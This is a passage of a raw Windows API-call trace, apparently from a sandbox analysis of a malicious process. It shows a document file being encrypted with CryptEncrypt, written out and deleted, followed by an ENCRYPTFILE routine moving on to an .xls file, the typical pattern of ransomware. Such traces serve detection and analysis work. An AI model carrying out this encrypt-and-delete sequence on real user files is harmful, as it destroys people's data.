hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0080.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.083] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb2b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.083] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0xbca0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0xbcb0) returned 1 [0080.083] CharLowerBuffW (in: lpsz="byte[48305]", cchLength=0xb | out: lpsz="byte[48305]") returned 0xb [0080.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.084] CryptEncrypt (in: hKey=0x41ac440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bd600*, pdwDataLen=0x144e2e0*=0xbca0, dwBufLen=0xbcb0 | out: pbData=0x49bd600*, pdwDataLen=0x144e2e0*=0xbcb0) returned 1 [0080.084] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.084] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.084] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.084] WriteFile (in: hFile=0x298, lpBuffer=0x49a5cc0*, nNumberOfBytesToWrite=0xbcb0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x49a5cc0*, lpNumberOfBytesWritten=0x144ece4*=0xbcb0, lpOverlapped=0x0) returned 1 [0080.092] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0080.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cafe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0080.093] CryptDestroyKey (hKey=0x41ac440) returned 1 [0080.093] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.093] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0080.093] CryptReleaseContext (hProv=0x41a48c0, dwFlags=0x0) returned 1 [0080.093] FreeLibrary (hLibModule=0x756e0000) returned 1 [0080.093] CloseHandle (hObject=0x258) returned 1 [0080.093] CloseHandle (hObject=0x298) returned 1 [0080.105] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots", lpFilePart=0x0) returned 0x36 [0080.106] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\ltd44h.ots")) returned 0x20 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0080.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0080.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d566e80, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0x1927e6d0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0x1927e6d0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lTD44h.ots", cAlternateFileName="")) returned 0x41abfc0 [0080.106] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\ltd44h.ots")) returned 1 [0080.193] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d566e80, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0x1927e6d0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0x1927e6d0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lTD44h.ots", cAlternateFileName="")) returned 0 [0080.193] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0080.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0080.193] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 1 [0080.193] TranslateMessage (lpMsg=0x144f084) returned 0 [0080.193] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0080.193] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0080.194] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0080.194] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0080.194] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0080.194] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.194] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0080.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0080.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0080.194] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0080.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0080.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0080.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x110) returned 0x43e87e8 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0080.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0080.195] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0080.196] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0080.196] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\VmdYvxc3Ol-gmt2M.xls", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee9540, ftCreationTime.dwHighDateTime=0x1d5ea21, ftLastAccessTime.dwLowDateTime=0x94a22970, ftLastAccessTime.dwHighDateTime=0x1d5eebe, ftLastWriteTime.dwLowDateTime=0x94a22970, ftLastWriteTime.dwHighDateTime=0x1d5eebe, nFileSizeHigh=0x0, nFileSizeLow=0x16373, dwReserved0=0x0, dwReserved1=0x8, cFileName="VmdYvxc3Ol-gmt2M.xls", cAlternateFileName="VMDYVX~1.XLS")) returned 0x41ac6c0 [0080.196] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0080.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0080.196] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0080.197] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0080.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0080.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0080.197] 